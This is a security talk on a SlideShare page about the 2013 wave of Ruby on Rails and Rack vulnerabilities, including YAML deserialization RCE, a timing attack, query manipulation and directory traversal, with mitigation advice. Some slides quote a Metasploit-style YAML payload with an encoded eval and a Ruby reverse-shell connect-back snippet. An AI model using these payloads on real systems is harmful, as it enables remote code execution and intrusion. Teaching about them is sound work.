What happened to Ruby-       on-Rails?       Louis Nyffenegger    louis@pentesterlab.com            @snyff
About me...● Independent security consultant:   ○ Code review   ○ Training   ○ Penetration testing● Work on really cool st...
Ruby-On-Rails● Ruby framework to develop web applications● Protect from most web security issues:  ○ SQL injections  ○ Cro...
What happened to Rails?● Recently a lot of vulnerabilities have been  published in Ruby-On-Rails● In the past, most vulner...
Rails Security: The usual suspects...@benmmurphy              @joernchen@tenderlove                                @homako...
Non technical reasons● People assumed it was secure● More and more used:  ○ more users -> more targeted  ○ if an applicati...
It all started... CVE-2012-5664● Talk from Joernchen (Phenoelit) at ZeroNights:    "Let me github that for you" (21/12/201...
It all started... CVE-2012-5664● Sessions secret exposed on Github:   ○ Arbitrary session modifications   ○ SQL injection ...
It all started... CVE-2012-5664● As always... Twitter started screaming and  loling on this bug...   ○ signal vs noise :/●...
It all started... CVE-2012-5664● If you want to do something like:  http://vulnerable/id[:select]=password from  users● Ra...
All could have happily stop here...but people started digging to find a        way around this...
And turned out...● Rails can do a LOT of stuff...   ○ parse traditional requests   ○ parse XML request   ○ parse JSON requ...
YAML● "YAML is a human-readable data  serialization format "(Wikipedia).     ---     receipt: Oz-Ware Purchase Invoice    ...
YAML inside XML...<?xml version="1.0" encoding="UTF-8"?><blah type="yaml">--- !ruby/hash:...</blah>
From YAML to code execution● To translate that in the OS world:  "you have FTP access to a system and want     to get comm...
From YAML to code execution: msfway<SWfzexMD type=yaml>--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteColle...
From YAML to code execution: msfway● You basically inject code that will get  evaluated by Ruby-On-Rails automatically● Th...
From YAML to code execution: msfwaycode = %(cmVxdW...ml9).unpack(%(m0)).firstif RUBY_PLATFORM =~ /mswin|mingw|win32/[...]e...
From YAML to code execution: msfwayrequire socket;c=TCPSocket.new("[::1]","4444");$stdin.reopen(c);$stdout.reopen(c); $std...
CVE-2013-0156... only POST?● Only POST?   ○ you need to send the XML in the body of the     request...● You can do a POST ...
CVE-2013-0155● "Unsafe Query Generation Risk in Ruby on  Rails" (not SQL injection) using JSON● Depends on the code used  ...
Rack● "Rack provides a minimal interface between  web servers supporting Ruby and Ruby  frameworks."● Used by Rails and ot...
Rack... CVE-2013-0263def digest_match?(data, digest) return unless data && digest @secrets.any? do |secret|    digest == g...
Rack... CVE-2013-0263● Timing attack...  ○ Create a malicious value  ○ Bruteforce a valid HMAC    ■ send HMAC "aaaaaaaaaaa...
CVE-2013-0277● Rails allows developers to store serialized  data easily:  class Post < ActiveRecord::Base    serialize :ta...
Rack... CVE-2013-0262● Directory traversal in Rack::File● When I looked at the bug I found a XSS in  the same code   ○ and...
Rubygems.org compromised● Gem == ruby library● Rubygems is like a Debian mirror for Ruby● Information about a package are ...
So what to do from now?● ".to_s all the things"   ○ most of the issues come from the mapping     performed by Ruby-On-Rail...
And since we are talking about Rails Someone recently put together all the way to   have vulnerable code in Ruby-on-Rails:...
Ruxmon feb 2013   what happened to rails
Upcoming SlideShare
Loading in...5
×

Ruxmon feb 2013 what happened to rails

408

Published on

Talk I did in February 2013 during Ruxmon monthly meeting

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
408
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
8
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Ruxmon feb 2013 what happened to rails

  1. 1. What happened to Ruby- on-Rails? Louis Nyffenegger louis@pentesterlab.com @snyff
  2. 2. About me...● Independent security consultant: ○ Code review ○ Training ○ Penetration testing● Work on really cool stuff in my free time: ○ https://pentesterlab.com/exercises ○ https://pentesterlab.com/bootcamp/
  3. 3. Ruby-On-Rails● Ruby framework to develop web applications● Protect from most web security issues: ○ SQL injections ○ Cross-Site Scripting ○ Cross-Site Request Forgery● Good reputation... including security wise
  4. 4. What happened to Rails?● Recently a lot of vulnerabilities have been published in Ruby-On-Rails● In the past, most vulnerabilities were low-risk issues but nothing really bad● This time were talking remote code execution
  5. 5. Rails Security: The usual suspects...@benmmurphy @joernchen@tenderlove @homakov@charliesome @postmodern_mod3
  6. 6. Non technical reasons● People assumed it was secure● More and more used: ○ more users -> more targeted ○ if an application didnt get any bug published its probably because no one cares● A lot of Ruby hackers: ○ Ruby-on-Rails devs ○ People looking for bugs in Ruby-on-Rails and Ruby-on- Rails applications
  7. 7. It all started... CVE-2012-5664● Talk from Joernchen (Phenoelit) at ZeroNights: "Let me github that for you" (21/12/2012)● Rack Session (used by Rails): ○ base64(Marshal(data))--HMAC(SHA1(base64(Marshal (data)), secret)● PentesterLabs exercise on this: https://pentesterlab. com/rack_cookies_and_commands_injection. html
  8. 8. It all started... CVE-2012-5664● Sessions secret exposed on Github: ○ Arbitrary session modifications ○ SQL injection if you know the secret and the application uses authlogic● Limited risk based on this... in theory
  9. 9. It all started... CVE-2012-5664● As always... Twitter started screaming and loling on this bug... ○ signal vs noise :/● A lot of people (including me) thought it was only exploitable in this condition: http://blog.pentesterlab.com/2013/01/on-exploiting-cve- 2012-5664.html http://blog.phusion.nl/2013/01/03/rails-sql-injection- vulnerability-hold-your-horses-here-are-the-facts/
  10. 10. It all started... CVE-2012-5664● If you want to do something like: http://vulnerable/id[:select]=password from users● Rails prevents this ○ if you submit a hash, all keys get converted to Strings. ○ then, Rails check that the keys submitted are valid symbols: def assert_valid_keys(*valid_keys) unknown_keys = keys - [valid_keys].flatten raise(ArgumentError, "Unknown key(s): #{unknown_keys.join(", ")}") unless unknown_keys.empty?
  11. 11. All could have happily stop here...but people started digging to find a way around this...
  12. 12. And turned out...● Rails can do a LOT of stuff... ○ parse traditional requests ○ parse XML request ○ parse JSON request● And you can send YAML inside JSON and XML requests...
  13. 13. YAML● "YAML is a human-readable data serialization format "(Wikipedia). --- receipt: Oz-Ware Purchase Invoice date: 2007-08-06 customer: given: Dorothy family: Gale
  14. 14. YAML inside XML...<?xml version="1.0" encoding="UTF-8"?><blah type="yaml">--- !ruby/hash:...</blah>
  15. 15. From YAML to code execution● To translate that in the OS world: "you have FTP access to a system and want to get commands execution from it"● Need to find a way to inject code and get it executed...● Many methods more or less reliable depending on the version of Ruby and Ruby- On-Rails
  16. 16. From YAML to code execution: msfway<SWfzexMD type=yaml>--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection XIH; eval(%[Y29k...KZW5k].unpack(%[m0])[0]); : !ruby/object:ActionController::Routing::Route segments: [] requirements: :tFuEk: :jyWUTgfc: :CAxk</SWfzexMD> 
  17. 17. From YAML to code execution: msfway● You basically inject code that will get evaluated by Ruby-On-Rails automatically● The same vulnerability can also be used to get SQL injection using Arel● From the code evaluated, msf does its usual stuff: ○ fork ○ connect back
  18. 18. From YAML to code execution: msfwaycode = %(cmVxdW...ml9).unpack(%(m0)).firstif RUBY_PLATFORM =~ /mswin|mingw|win32/[...]else if ! Process.fork() eval(code) rescue nil endend
  19. 19. From YAML to code execution: msfwayrequire socket;c=TCPSocket.new("[::1]","4444");$stdin.reopen(c);$stdout.reopen(c); $stderr.reopen(c);$stdin.each_line {|l| l=l.strip next if l.length==0 system(l)}
  20. 20. CVE-2013-0156... only POST?● Only POST? ○ you need to send the XML in the body of the request...● You can do a POST request and use the HTTP header: "X-HTTP-Method- Override: get" to get Rails to use your payload as if it was in a GET request
  21. 21. CVE-2013-0155● "Unsafe Query Generation Risk in Ruby on Rails" (not SQL injection) using JSON● Depends on the code used user = User.find_by_token(params[:token]) -> SELECT * FROM users where token=...● You can manipulate the query using JSON to remove the WHERE statement: -> SELECT * FROM users
  22. 22. Rack● "Rack provides a minimal interface between web servers supporting Ruby and Ruby frameworks."● Used by Rails and other frameworks● Two vulnerabilities published in the same period: ○ CVE-2013-0262 ○ CVE-2013-0263 (already reported in 2009)
  23. 23. Rack... CVE-2013-0263def digest_match?(data, digest) return unless data && digest @secrets.any? do |secret| digest == generate_hmac(data, secret) endend
  24. 24. Rack... CVE-2013-0263● Timing attack... ○ Create a malicious value ○ Bruteforce a valid HMAC ■ send HMAC "aaaaaaaaaaa..." ■ send HMAC "baaaaaaaaaa..." ■ send HMAC "caaaaaaaaaa..." ■ ... ■ compare responses time● Unlikely from Internet ○ "intercloud" attacks...
  25. 25. CVE-2013-0277● Rails allows developers to store serialized data easily: class Post < ActiveRecord::Base serialize :tags end● Turns out the serialisation is done using YAML... If a user can manipulate this parameter... game over :/
  26. 26. Rack... CVE-2013-0262● Directory traversal in Rack::File● When I looked at the bug I found a XSS in the same code ○ and another one in similar code in another file fail(404, "File not found: #{path_info}" ○ and the fact that rack follows symlinks● Turns out this is used by BEEF... Content- Type: text/plain limits impact tho
  27. 27. Rubygems.org compromised● Gem == ruby library● Rubygems is like a Debian mirror for Ruby● Information about a package are stored inside a metadata.gz which is a compressed YAML file... and this information get displayed on the website: ○ Someone uploaded an "exploit.gem"...
  28. 28. So what to do from now?● ".to_s all the things" ○ most of the issues come from the mapping performed by Ruby-On-Rails● Upgrade... (bundler-audit)● Remove parsers you dont need:ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML)ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON)
  29. 29. And since we are talking about Rails Someone recently put together all the way to have vulnerable code in Ruby-on-Rails: http://rails-sqli.org/ You should also check Meders Ruby Security Reviewers Guide:http://code.google.com/p/ruby- security/wiki/Guide
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×